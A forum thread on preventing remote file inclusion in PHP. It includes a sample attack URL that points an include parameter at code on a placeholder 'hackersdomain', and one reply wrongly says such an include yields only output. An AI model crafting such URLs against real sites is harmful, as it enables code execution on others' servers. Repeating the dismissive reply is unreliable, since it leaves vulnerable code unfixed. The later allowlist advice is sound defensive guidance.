preventing Remote File Inclusion

[jeff5656]

Would this work to prevent remote file inclusion vulnerability?

 

$file = "../include/links.php";
if ($file = '../include/links.php'){
include $file;
}

[Alex]

That would always be true, so it's pretty pointless. What exactly are you trying to prevent? No one can just include your PHP files and get the code; if that's what you're trying to prevent.

[jeff5656]

Couldn't a hacker trick my page into including a file on their website by typing something like this into their browser:

 

http://mydomain/index.php?file=http://hackersdomain/code.txt

 

[Alex]

No. When including the remote file all they will get is the output of the file, not the source code.

[jeff5656]

Ok thats good.  But then why are all these sites out there warning about "remote file inclusion"vulnerabilities and talking about functions etc to prevent it.

In my code all I do is:

 

include "file.php";

 

Are these includes not vulnerable?

[PFMaBiSmAd]

Yes, if you are including a file based on a GET parameter passed to your code, you must validate that the file name is just an allowed value (which will eliminate those cases where it is an actual URL of some raw php code on a hacker's site.)

 

Also, you must validate the file name in the context where it is being included (only allow the correct files to be included on any particular page.) This is needed to prevent someone on your site from including say an administrative file on your site when they are only a guest on your site.

 

Edit: If you are including a literal file name, as in include "file.php";, then no, that is the only file that can possibly be included by that line of code.